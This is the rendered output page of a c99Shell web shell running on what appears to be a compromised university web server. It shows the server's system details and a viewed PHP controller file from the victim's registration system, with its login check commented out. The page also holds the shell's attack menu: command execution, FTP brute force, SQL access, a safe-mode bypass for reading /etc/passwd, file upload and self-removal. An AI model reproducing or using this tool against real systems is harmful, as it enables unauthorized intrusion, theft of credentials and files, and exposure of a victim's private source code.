!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/   drwxrwxrwx
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     my_controller.php (6.27 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
/**
 * System in Educational Enterprise Resource Planning System
 *
 * LICENSE
 *
 * This source file is subject to the GPL license that is bundled
 * with this package in the file licence.txt.
 *
 * @package        System in Educational Enterprise Resource Planning System
 * @subpackage    Registration System
 * @copyright      Copyright (C) 2011 by Information System Engineering Research Labolatory, Burapha University
                http://iserl.buu.ac.th
                iserl.callcenter@gmail.com
 * @license        http://cvs.buu.ac.th/mis/license.php GNU GPL v1
 * @author         Information System Engineering Research Labolatory, Burapha University
 *
 *
 */
class My_controller extends CI_Controller {

    public $body;
    public $mmn;

    public function __construct()
    {
        parent::__construct();
        $this->load->library('session');
        $this->body '';
        /*if (!$this->session->userdata('logged_in'))
        {
            redirect('/login');
        }*/
        /*else {
            $uri = uri_string();
            $uo_id =  $this->session->userdata('useroffId');
            //echo "$uo_id , $uri";
            $this->load->model('m_ad_user_officer','uf');
            $result = $this->uf->checkMenu($uo_id,$uri);
            if(!$result){
               redirect('officer/unAuthorize');
            }
            
        }*/
    }

    function setCRUD($UsID,$gpid,$mnid){
        $this->load->model('ums/m_umpermission','');
        $this->load->model('ums/m_umgpermission','');

        $X 1;
        $C 1;
        $R 1;
        $U 1;
        $D 1;
        $oUp $this->m_umpermission->SearchByKey($UsID$mnid);

        if ($oUp){
            $X $oUp['pmX'];
            $C $oUp['pmC'];
            $R $oUp['pmR'];
            $U $oUp['pmU'];
            $D $oUp['pmD'];
        } else {
            $oGp $this->m_umgpermission->SearchByKey($gpid$mnid);
            if ($oGp){
                $X $oGp['gpX'];
                $C $oGp['gpC'];
                $R $oGp['gpR'];
                $U $oGp['gpU'];
                $D $oGp['gpD'];
            }
        }

        $data = array(    'X' => $X,
                    'C' => $C,
                    'R' => $R,
                    'U' => $U,
                    'D' => $D);
        $this->session->set_userdata($data);

        return 0;
    }

    function show() {
        $UsID $this->session->userdata('UsID');
        $gpid $this->session->userdata('GpID');
        $stid $this->session->userdata('StID');
        $mnid $this->session->userdata('MnID');
        if($this->session->userdata('MnID')){
            $this->setCRUD($UsID,$gpid,$mnid);
        }

        if($this->session->userdata('logged_in')){
            $data ='';
            if($this->session->userdata('StID')){
                $this->load->model('ums/m_ummenu','');
                $data['mmn']= $this->m_ummenu->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,0,0);
                if($this->session->userdata('MnID')){
                    $data['history'] = $this->menuHistory($this->session->userdata('MnID'));
                }
            }
            $mn['menu'] = $this->load->view('info/v_postlogin',$data,true);
            $lv['body'] = $this->body;
            $lv['blog'] = (isset($this->blog)) ? $this->blog '';
        }else{
            $mn['menu'] = $this->load->view('info/v_prelogin','',true);
            $lv['body'] = $this->load->view('info/v_info','',true);
        }

        $lv['head'] = $this->load->view('info/v_header',$mn,true);

        $lv['footer'] = $this->load->view('info/v_footer','',true);

        $this->load->view('info/v_in',$lv);
    }

    function showPopup() {
        $mn '';
        $lv['head'] = $this->load->view('info/v_headerPopup',$mn,true);
        $lv['body'] = $this->body;
        $lv['footer'] = $this->load->view('info/v_footerPopup','',true);;

        $this->load->view('info/v_in',$lv);
    }

    function genMn(){

        $stid $this->session->userdata('StID');
        $gpid $this->session->userdata('GpID');
        $UsID $this->session->userdata('UsID');

        $this->load->model('ums/m_ummenu','');
        $rs $this->m_ummenu->RSByStIDGpIDUsIDPrIDLv($stid,$gpid,$UsID,0,0);

        return $rs;
    }

    function menuHistory($MnID){
        $his "";
        $this->load->model('ums/m_ummenu','m1');
        $qry $this->m1->getByKey($MnID);
        $rs $qry->row();

        if($qry->num_rows()) {

            $rs $qry->row();

            if($rs->MnParentMnID>0){
                $ret $this->menuHistory($rs->MnParentMnID);
                //$img = "<img src=\"".base_url()."images/submenu_mini.gif\" align='absmiddle' border='0'> ";
                $img ' » ';
                if($rs->MnURL != '')
     $his.=$ret.$img."<span onclick=\"doSubmitMn(".$rs->MnStID.",".$rs->MnID.")\" onmouseover=\"this.style.cursor='pointer';this.style.color = '#0066FF';\" onmouseout=\"this.style.color = '#000000';\">".$rs->MnNameT."</span>";
    //                $his.=$ret." $img <a href=\" ".site_url()."info/info/submenu/$rs->MnStID/$rs->MnID\">$rs->MnNameT</a>";

                else
                    $his.=$ret." $img $rs->MnNameT";
                //$his.=$ret." $img <a href=\" ".site_url()."info/info/submenu/$rs->MnStID/$rs->MnID\">$rs->MnNameT</a>";
            }else{
                $img "<img src=\"".base_url()."images/sysgrp_mini.gif\" align='absmiddle' border='0'> ";
    //            $his = "$img <a href=\" ".site_url()."info/info/submenu/$rs->MnStID/$rs->MnID\">$rs->MnNameT</a> ";
     $his.=$img."                <span onclick=\"doSubmitMn(".$rs->MnStID.",".$rs->MnID.")\" onmouseover=\"this.style.cursor='pointer';this.style.color = '#0066FF';\" onmouseout=\"this.style.color = '#000000';\">".$rs->MnNameT."</span>";

            }
        }
        return $his;
    }
    function loginByPsId ($stid=""$gpid=""$ps_id="") {
        $this->load->model('ums/m_umuser','obj');
        $rs $this->obj->checkUserByPsId($ps_id);
        if ($rs) {
            $data = array('UsID' => $rs['UsID'],
                            'UsName' => $rs['UsName'],
                            'UsLogin' => $rs['UsLogin'],
                            'UsPsCode' => $rs['UsPsCode'],
                            'UsWgID' => $rs['UsWgID'],
                            'logged_in' => TRUE);
            $this->session->set_userdata($data);
            redirect('/info/info/mainMenu/'.$stid.'/'.$gpid);
        } else {
            $this->session->set_flashdata('message''<div id="message" align="center"><font color="red">ชื่อเข้าใช้งานหรือรหัสผ่านผิดพลาด</font></div>');
            redirect('info/info');
        }
    }

}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--